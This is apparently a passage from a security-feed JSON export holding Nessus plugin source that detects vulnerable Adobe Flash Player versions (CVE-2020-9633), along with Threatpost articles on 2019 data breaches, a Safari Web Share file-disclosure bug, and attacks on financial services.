(!empty_or_null(pkg['cpu'])) _cpu = pkg['cpu'];\n if (!empty_or_null(pkg['el_string'])) el_string = pkg['el_string'];\n if (!empty_or_null(pkg['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = pkg['rpm_spec_vers_cmp'];\n if (!empty_or_null(pkg['epoch'])) epoch = pkg['epoch'];\n if (!empty_or_null(pkg['allowmaj'])) allowmaj = pkg['allowmaj'];\n if (!empty_or_null(pkg['exists_check'])) exists_check = pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat() + flash_plugin_caveat;\n else extra = rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat;\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'flash-plugin');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-13T14:32:15", "description": "Adobe reports :\n\n- This 
update resolves a use-after-free vulnerability that could lead to arbitrary code execution (CVE-2020-9633).", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "nessus", "title": "FreeBSD : Flash Player -- arbitrary code execution (196b31b8-aa9a-11ea-a59a-6451062f0f7a)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2020-06-22T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:linux-flashplayer", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_196B31B8AA9A11EAA59A6451062F0F7A.NASL", "href": "https://www.tenable.com/plugins/nessus/137285", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2020 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(137285);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/06/22\");\n\n script_cve_id(\"CVE-2020-9633\");\n\n script_name(english:\"FreeBSD : Flash Player -- arbitrary code execution (196b31b8-aa9a-11ea-a59a-6451062f0f7a)\");\n script_summary(english:\"Checks for updated package in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote FreeBSD host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Adobe reports :\n\n- This update resolves a use-after-free vulnerability that could lead\nto arbitrary code execution (CVE-2020-9633).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\"\n );\n # https://vuxml.freebsd.org/freebsd/196b31b8-aa9a-11ea-a59a-6451062f0f7a.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bca34265\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n 
script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:linux-flashplayer\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"linux-flashplayer<32.0.0.387\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-12T14:19:15", "description": "The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 32.0.0.371. It is, therefore, affected by an use after free vulnerability. 
An unauthenticated, remote attacker can exploit this, via a specially crafted file, to execute arbitrary code within the context of the user.", "cvss3": {}, "published": "2020-06-09T00:00:00", "type": "nessus", "title": "Adobe Flash Player <= 32.0.0.371 (APSB20-30)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-9633"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:flash_player"], "id": "FLASH_PLAYER_APSB20-30.NASL", "href": "https://www.tenable.com/plugins/nessus/137253", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(137253);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2020-9633\");\n script_xref(name:\"IAVA\", value:\"2020-A-0246-S\");\n\n script_name(english:\"Adobe Flash Player <= 32.0.0.371 (APSB20-30)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has a browser plugin installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Adobe Flash Player installed on the remote Windows host is equal or prior to version 32.0.0.371. It is,\ntherefore, affected by an use after free vulnerability. 
An unauthenticated, remote attacker can exploit this, via a\nspecially crafted file, to execute arbitrary code within the context of the user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb20-30.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe Flash Player version 32.0.0.387 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-9633\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:flash_player\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"flash_player_installed.nasl\");\n script_require_keys(\"SMB/Flash_Player/installed\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/Flash_Player/installed\");\n\n# Identify vulnerable versions.\ninfo = \"\";\nvariants = make_list(\n \"Plugin\",\n \"ActiveX\",\n \"Chrome\",\n \"Chrome_Pepper\"\n);\n\n# we're checking for versions less than *or equal to* the cutoff!\nforeach variant (variants)\n{\n vers = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/Version/*\");\n files = get_kb_list(\"SMB/Flash_Player/\"+variant+\"/File/*\");\n\n if (isnull(vers) || isnull(files))\n continue;\n\n foreach key (keys(vers))\n {\n ver = vers[key];\n if (isnull(ver))\n continue;\n\n # <= 32.0.0.371\n if (ver_compare(ver:ver,fix:\"32.0.0.371\",strict:FALSE) <= 0)\n {\n num = key - (\"SMB/Flash_Player/\"+variant+\"/Version/\");\n file = files[\"SMB/Flash_Player/\"+variant+\"/File/\"+num];\n if (variant == \"Plugin\")\n {\n info += '\\n Product : Browser Plugin (for Firefox / Netscape / Opera)';\n fix = \"32.0.0.387\";\n }\n else if (variant == \"ActiveX\")\n {\n info += '\\n Product : ActiveX control (for Internet Explorer)';\n fix = \"32.0.0.387\";\n }\n else if (\"Chrome\" >< variant)\n {\n info += '\\n Product : Browser Plugin (for Google Chrome)';\n if (variant == \"Chrome\")\n fix = \"Upgrade to a version of Google Chrome running Flash Player 32.0.0.387\";\n }\n info += '\\n Path : ' + file +\n '\\n Installed version : ' + ver;\n if (variant == \"Chrome_Pepper\")\n info += '\\n Fixed version : 32.0.0.387 (Chrome PepperFlash)';\n else if (!isnull(fix))\n info += '\\n Fixed version : '+fix;\n info += '\\n';\n }\n }\n}\n\nif (info)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n if (report_verbosity > 0) security_hole(port:port, extra:info);\n else security_hole(port);\n}\nelse\n{\n if (thorough_tests)\n exit(0, 'No vulnerable versions of 
Adobe Flash Player were found.');\n else\n exit(1, 'Google Chrome\\'s built-in Flash Player may not have been detected because the \\'Perform thorough tests\\' setting was not enabled.');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2020-10-15T22:27:02", "description": " * [](<https://threatpost.com/category/privacy/> \"Data Breach\" )\n\n**Top 10 Breaches and Leaky Server Screw Ups of 2019**\n\nFrom massive credential spills on the Dark Web and hacked data to card-skimming and rich profiles exposed by way of cloud misconfigurations, 2019 was a notable year for data breaches. Big names like Capital One, Macy\u2019s and Sprint were impacted, as was the entire country of Ecuador and supply-chain companies like the American Medical Collection Agency. Here are our Top 10 data leak moments of the year.\n\n * [](<https://threatpost.com/773m-credentials-dark-web/140972/> \"Password draft\" )\n\n**Collections 1-4 Spill Millions of Credentials on the Dark Web**\n\nThe year started out with a bang when a huge trove of data \u2013 containing 773 million unique email addresses and passwords \u2013 [was discovered](<https://threatpost.com/773m-credentials-dark-web/140972/>) on a popular underground hacking forum. The credential spill was dubbed \u201cCollection #1\u201d and totaled 87GB of data, with records culled from breaches that occurred as far back as 2010, including the well-known compromise of Yahoo. It was one of the largest jackpots ever seen when it comes to account-compromise efforts. 
[Collections 2-4 soon followed](<https://threatpost.com/fourth-credential-spill-dreammarket/142901/>), and ultimately more than 840 million account records from 38 companies appeared for sale on the Dark Web in February.\n\n * [](<https://threatpost.com/amca-healthcare-hack-widens-opko/145453/> \"amca draft2\" )\n\n**AMCA Supply-Chain Breach Impacts 20.1 Million**\n\nA hack of the American Medical Collection Agency (AMCA), a third-party bill collection vendor, impacted 20.1 million patients [over the summer](<https://threatpost.com/amca-healthcare-hack-widens-opko/145453/>), exposing personally identifiable information such as names, addresses and dates of birth, and also payment data. Three clinical laboratories offering blood tests and the like that relied on AMCA to process a portion of their consumer billing were hit: 12 million patients from Quest Diagnostics, another 7.7 million patients from LabCorp and 400,000 victims from OPKO Health.\n\n * [](<https://threatpost.com/aws-arrest-data-breach-capital-one/146758/> \"capital-one\" )\n\n**Capital One: Another Year, Another Major FinServ Breach**\n\nIn July, a massive breach of Capital One customer data hit more than 100 million people in the U.S. and 6 million in Canada. Thanks to a cloud misconfiguration, a hacker [was able to access](<https://threatpost.com/aws-arrest-data-breach-capital-one/146758/>) credit applications, Social Security numbers and bank account numbers in one of the biggest data breaches to ever hit a financial services company \u2014 putting it in the same league in terms of size as the Equifax incident of 2017. The FBI arrested a suspect in the case: A former engineer at Amazon Web Services (AWS), Paige Thompson, after she boasted about the data theft on GitHub. 
Researchers said that Capital One victims are going to be phished for years to come \u2013 long after their 12 months of credit monitoring is done.\n\n * [](<https://threatpost.com/267m-facebook-phone-numbers-exposed-online/151327/> \"Facebook draft\" )\n\n**Facebook\u2019s Year of Breach Problems**\n\nFacebook had a bad year for breaches, including the December emergence of a [hacked database](<https://threatpost.com/267m-facebook-phone-numbers-exposed-online/151327/>) containing the names, phone numbers and Facebook user IDs of 267 million platform users. The data may have been stolen from [Facebook\u2019s developer API](<https://threatpost.com/facebook-privacy-breach-developers-group-data/149930/>) before the company restricted API access to phone numbers and other data in 2018. And in September, an open server was [discovered leaking](<https://techcrunch.com/2019/09/04/facebook-phone-numbers-exposed/>) hundreds of millions of Facebook user phone numbers. In April, [researchers found two separate datasets](<https://threatpost.com/facebook-and-amazon-are-locked-in-a-blame-game-over-leaked-data-whos-really-to-blame/143467/>), held by two app developers (Cultura Colectiva and At the Pool). The actual data source for the records (like account names and personal data) in these databases was Facebook.\n\n * [](<https://threatpost.com/marketing-analytics-leaks-deep-profiles-ecuador/148363/> \"Ecuador\" )\n\n**Deep Profiles for the Entire Population of Ecuador Are Exposed**\n\nIn September it came to light that the entire population of Ecuador (as well as Julian Assange) [had been impacted](<https://threatpost.com/marketing-analytics-leaks-deep-profiles-ecuador/148363/>) by an open database with rich, detailed life information collected from public-sector sources by a marketing analytics company. The trove of data offered any attacker the ability to cross-reference and combine the data into a highly personal, richly detailed view of a person\u2019s life. 
The records, for 20 million individuals, were gleaned from Ecuadorian government registries, an automotive association called Aeade, and the Ecuadorian national bank. Ecuador has about 16.5 million citizens in total (some of the entries were for deceased persons).\n\n * [](<https://threatpost.com/data-enriched-profiles-1-2b-leak/150560/> \"data profile\" )\n\n**1.2B Rich Profiles Exposed By Data Brokers**\n\nIn a similar incident to the Ecuador debacle, an open Elasticsearch server emerged in December that exposed the rich profiles of more than 1.2 billion people. The database [consisted of scraped information](<https://threatpost.com/data-enriched-profiles-1-2b-leak/150560/>) from social media sources like Facebook and LinkedIn, combined with names, personal and work email addresses, phone numbers, Twitter and Github URLs and other data. Taken together, the profiles provide a 360-degree view of individuals, including their employment and education histories. All of the information was unprotected, with no login needed to access it. The data was linked to People Data Labs (PDL) and OxyData[.]io.\n\n * [](<https://threatpost.com/imperva-data-breach-cloud-misconfiguration/149127/> \"Imperva\" )\n\n**Security Specialist Imperva Smarts from Cloud Misconfiguration**\n\nIn an ironic turn of events, cybersecurity company Imperva allowed hackers to steal and use an administrative Amazon Web Services (AWS) API key in one of Imperva\u2019s production AWS accounts, thanks to a cloud misconfiguration. Hackers used Imperva\u2019s Cloud Web Application Firewall (WAF) product to access a database snapshot containing emails, hashed and salted passwords, and some customers\u2019 API keys and TLS keys. Because the database [was accessed as a snapshot](<https://threatpost.com/imperva-data-breach-cloud-misconfiguration/149127/>), the hackers made off with only old Incapsula records that go up to Sept. 15, 2017. 
However, the theft of API keys and TLS keys would allow an attacker to break companies\u2019 encryption and access corporate applications directly.\n\n * [](<https://threatpost.com/att-verizon-subscribers-exposed-mobile-bills/150867/> \"Sprint draft\" )\n\n**Sprint Contractor Lays Open Phone Bills for 260K Subscribers**\n\nA cloud misconfig was also behind hundreds of thousands of mobile phone bills for AT&T, Verizon and T-Mobile subscribers [being exposed](<https://kasperskycontenthub.com/threatpost-global/wawa-data-breach-malware-stole-customer-payment-card-info/151337/>) to the open internet in December, thanks to the oversight of a contractor working with Sprint. More than 261,300 documents were stored \u2013 mainly cell phone bills from Sprint customers who switched from other carriers. Cell phone bills are a treasure trove of data, and include names, addresses and phone numbers along with spending histories and, in many cases, call and text message records.\n\n * [](<https://threatpost.com/magecart-infestations-saturate-web/148911/> \"Magecart\" )\n\n**Magecart Siphons Off Millions of Payment Card Details**\n\nMagecart, the digital card-skimming collective encompassing several different affiliates all using the same modus operandi, is now so ubiquitous that its infrastructure is [flooding the internet](<https://threatpost.com/magecart-infestations-saturate-web/148911/>), researchers said earlier this year. 
Magecart attacks, which involve inserting virtual credit-card skimmers into e-commerce check-out pages, affected a range of companies throughout 2019; these included [bedding retailers](<https://threatpost.com/magecart-mypillow-emerisleep-attack/143022/>) MyPillow and Amerisleep, the subscription website for the [Forbes print magazine](<https://threatpost.com/magecart-card-skimmer-forbes/144811/>), at least [80 reputable brands](<https://threatpost.com/magecart-ecommerce-card-skimming-bonanza/147765/>) in the motorsports industry and luxury apparel segments, popular skin care brand First Aid Beauty, [Macy\u2019s](<https://threatpost.com/magecart-attack-skin-care-site/149580/>) and streaming video and podcast content company [Rooster Teeth](<https://threatpost.com/rooster-teeth-attack-magecart/151216/>).\n\n * [](<https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/> \"equifax\" )\n\n**Equifax Settlement Rankles Consumers**\n\nEquifax made notable news this year when it agreed to pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers. That includes $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S., and $100 million in civil penalties. Some consumers are furious over what they view as an unfair settlement, though, with 200,000 of them signing a petition against the deal. 
The petition argues that very little of that cash will trickle down to those who actually suffered because of the breach.\n\n\n", "cvss3": {}, "published": "2019-12-26T14:00:09", "type": "threatpost", "title": "Top 10 Breaches and Leaky Server Screw Ups of 2019", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2019-12-26T14:00:09", "id": "THREATPOST:5411DD62D790E8DA914441FC7BFE1358", "href": "https://threatpost.com/top-10-breaches-leaky-server-2019/151386/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:14:51", "description": "A security researcher disclosed details of an Apple Safari web browser security hole that could leak files with other browsers and applications and open the door to exploitation by attackers. The disclosure came only after Apple said it would delay patching the vulnerability for nearly a year. For context, the researcher rated the bug as \u201cnot very serious\u201d.\n\nPolish security researcher [Pawel Wylecial](<https://www.blogger.com/profile/10114474176396848494>), co-founder of [REDTEAM.PL](<https://blog.redteam.pl/>), unveiled the flaw. He attributed the bug to Safari\u2019s implementation of the [Web Share API](<https://w3c.github.io/web-share/>), according to a [blog post](<https://blog.redteam.pl/2020/08/stealing-local-files-using-safari-web.html>) outlining his finding on Monday. The API, which is relatively new, allows users to share links from the browser via third-party applications, such as those distributed via mail and messaging apps.\n\nThe problem is that the implementation\u2019s _file:_ scheme, on both the mobile and desktop versions of Safari, allows access to files stored on the user\u2019s local hard drive. 
This can lead to someone unknowingly sharing personal files or data with a malicious site when assuming they are only sharing an article or link with their friends, Wylecial wrote.\n\n\u201cThe problem is that _file: scheme_ is allowed, and when a website points to such a URL unexpected behavior occurs,\u201d Wylecial explained in his post. \u201cIn case such a link is passed to the navigator.share function an actual file from the user file system is included in the shared message, which leads to local file disclosure when a user is sharing it unknowingly.\u201d\n\nWylecial acknowledged that the \u201cproblem is not very serious\u201d because it requires a user to take action rather than allowing an attacker to remotely control someone\u2019s system without their knowledge.\n\nHowever, he said it\u2019s not difficult to make the shared file invisible to the user, comparing the capability the flaw gives an attacker to clickjacking in the way it aims \u201cto convince the unsuspecting user to perform some action.\u201d\n\nThat the bug is not super-serious may not be the point, however. Wylecial\u2019s disclosure once again highlights Apple\u2019s [lackluster approach](<https://threatpost.com/google-bug-hunter-urges-apple-to-change-its-ios-security-culture/134842/>) to patching vulnerabilities discovered by third-party researchers as well as a [historically chilly relationship](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>) with them.\n\nWylecial reported the bug to Apple on April 17 of this year, with the company acknowledging four days later that it had received his report. After much back and forth, earlier this month Apple said it would address the issue in the Spring 2021 update to Safari, which would be nearly a year after the issue was reported.\n\nThis prompted Wylecial to reveal his research, he said. 
The researcher said he told Apple \u201cthat waiting with the disclosure for almost an additional year, while four months already have passed since reporting the issue, is not reasonable.\u201d He then went public with his research.\n\nIndeed, the disclosure shows the ongoing tension between Apple and security researchers, which many thought was on its way to being solved when the company finally [opened its bug bounty program to the public](<https://threatpost.com/apples-bug-bounty-opens-1m-payout/151334/>) in December 2019, a move announced four months before [at Black Hat in August](<https://threatpost.com/apple-upgrades-bug-bounty-program-adds-macs-1m-reward/147146/>).\n\nThe revamped public program boosted payouts and expanded the platform playing field for researchers over the previous program, which was invite-only with rewards only as high as $200,000 on limited platforms. Now researchers can receive up to $1 million for the most critical of zero-day flaws on its latest hardware, and between $25,000 and $500,000 for discovering vulnerabilities in a range of other products, including Macs, iPhone and iPad, and Apple TV.\n\nEven after the changes, however, some notable researchers, including Google\u2019s Project Zero researcher Ian Beer\u2014known for discovering a number of [zero-day iOS flaws](<https://threatpost.com/iphone-zero-days-watering-hole-attacks/147891/>)\u2014balked at participating in the Apple bug bounty program.\n", "cvss3": {}, "published": "2020-08-25T15:28:20", "type": "threatpost", "title": "Safari Bug Revealed After Apple Takes Nearly a Year to Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-25T15:28:20", "id": "THREATPOST:00F7DE33B40C4ED287762FBA680EB607", "href": "https://threatpost.com/safari-bug-revealed-after-apple-takes-nearly-a-year-to-patch/158612/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-10-15T22:35:47", "description": "Cybercriminals continue to firehose financial services companies with new and innovative cyberattacks. Research from Akamai recently found that up to 75 percent of all credential abuse attacks against the financial services industry in 2019 targeted APIs directly (rather than user-facing login pages). 
One such credential stuffing attack, observed last summer, hit one of Akamai\u2019s financial services customers with a blizzard of 55 million malicious login attempts.\n\n\u201cWe talk about API attacks and the reason why criminals are using targeted methods against API because the traditional \u2018throw it and hope it sticks\u2019 against financial services just isn\u2019t cutting it anymore, they have to be more creative,\u201d Steve Ragan, security researcher with Akamai, told Threatpost. \u201cAnd of course this creates this \u2018run and gun\u2019 type of situation to where the financial services industry has to keep adding more layers and getting more creative with how they\u2019re doing defense because the criminals are obviously coming at them full steam ahead.\u201d\n\nThreatpost talks to Ragan about the hardest hitting attack threats against the financial services industry, including credential stuffing attacks, DDoS attacks and more.\n\n_A lightly edited transcript is below._\n\n**Lindsey O\u2019Donnell-Welch**: Hi, everyone, this is Lindsey O\u2019Donnell-Welch with Threatpost and I\u2019m here at RSA Conference in San Francisco, joined by Steve Ragan with Akamai. Steve, thanks so much for joining us.\n\n**Steve Ragan:** Thanks for having me.\n\n**LO: **How\u2019s your conference going, so far?\n\n**SR:** So far, it\u2019s going good. had a lot of productive meetings this week. It\u2019s been a very long week. And it\u2019s only Wednesday.\n\n**LO:** Right yeah. Yeah, so I wanted to talk a little bit about, Akamai recently published a research paper last Wednesday. And it was discussing some really interesting takeaways about the state of internet security and how that impacts financial services. And there were some really good points in the research about kind of DDoS attacks and how that impacts financial services as well as credential stuffing and APIs. 
So just to start, can you talk about some of the biggest takeaways that you had in terms of what the research was about.\n\n**SR: **So the big one of the biggest takeaways I got from the report when I was researching it, is the fact that, the last time we wrote about financial services, I had mentioned that the criminals were steadily targeting them, and they weren\u2019t slowing down anytime soon. As this report was being put together, not only did that get proven true, it actually got bigger. So shortly after we put out the last financial services report, we actually saw a record setting attack for us, one of the largest against FinServ that we\u2019d seen since we started tracking this, upwards of like 55 million credential stuffing attempts. And then as we started sorting and sifting through the data, we noticed that, like you had mentioned, DDoS, when it comes to unique DDoS targets, 40 percent of those were in the financial services sector, which is significant. We saw a bump in targeted API attacks for credential stuffing against the FinServ sector and then also local file inclusion jumped up ahead of SQL injection when it comes to the type of web attacks we\u2019re seeing against financial services. So there are a couple of things that stood out in this report. But the the big key takeaway is that criminals are still actively engaged and targeting financial services.\n\n**LO:** Right. And I want to kind of delve into those separate types of attacks and attack vectors in a second. But maybe we should take a step back and look at financial services as a whole and kind of what the main security issues are with the industry. 
Can you kind of give an outline of financial services and where they are and where the industry is at this point about these attacks.\n\n**SR:** So it\u2019s, it\u2019s really interesting Financial Services is usually the industry that\u2019s always at the top of their game when it comes to security, which forces the criminals to get creative in their attacks, they have to be hyper focused. So part of this report, we talk about API attacks and the reason why criminals are using targeted methods against API because the traditional \u201cthrow it and hope it sticks\u201d against financial services just isn\u2019t cutting it anymore, they have to be more creative. And of course this creates like this this run and gun type of situation to where the financial services industry has to keep adding more layers and getting more creative with how they\u2019re doing defense because the criminals are obviously coming at them full steam ahead. You see a lot of the same problems in financial services as you do with any other market segment. So the old standbys are still there. Web attacks are always going to have SQL injection, you\u2019re going to see that, you\u2019re going to see DDoS as a distraction and as a way to cut vital services off from customers. You\u2019re going to see this no matter what industry you\u2019re looking at. But when it comes to financial services, what we\u2019ve noticed is, criminals tend to take a hybrid approach in their attacks. So you\u2019ll see attacks that leverage SQL injection attempts versus a little bit of DDoS mixed in there. And then when you see DDoS, the way they launch these attacks, it\u2019s a myriad of attempts. So you\u2019ll see SYN flooding, you\u2019ll see RTSP you\u2019ll see all of that mixed in, so it goes across the board.\n\n**LO:** Well, that\u2019s what kind of stuck out to me about kind of the DDoS attacks that you guys were observing was just the variation in different methods that were being used. 
And so, what do you see, what\u2019s kind of the overall trends that you\u2019re seeing with DDoS attacks in targeting the financial industry?\n\n**SR:** We\u2019re seeing sustained attacks. So what I mean by this is, they get bigger and they last longer. So we\u2019re seeing you know, FinServ companies and I say FinServ, but I mean financial services, right I get that jargon stuck in my head, it doesn\u2019t go anywhere. But we\u2019re seeing these attacks stay longer, and they keep variations going so they don\u2019t stick to just one type of DDoS attack anymore. They\u2019re layering them throughout. And they just keep going, until eventually they just fall off. We\u2019ve noticed that if you look in the report, we look at the peaks of traffic. And sometimes when we see these, these records setting, and I say record setting, meaning just like it stands out in the report, but when you see these attacks, it\u2019s FinServ that\u2019s getting hit, it\u2019s getting hit the hardest in some ways.\n\n**LO:** Yeah. And I mean, to your point about DDoS attacks that are targeting FinServ of getting getting bigger and bigger. I think that\u2019s a trend we\u2019re seeing overall, too, with DDoS attacks, growing and getting more widespread.\n\n**SR:** You don\u2019t hear about DDoS a lot. And that\u2019s one of the things we\u2019re trying to correct because we want to we want people to realize DDoS attacks are very real, they happen and they\u2019re not going away anytime soon. So it\u2019s it\u2019s a thing that we want to keep that awareness out there, which is why we included it in this report because it 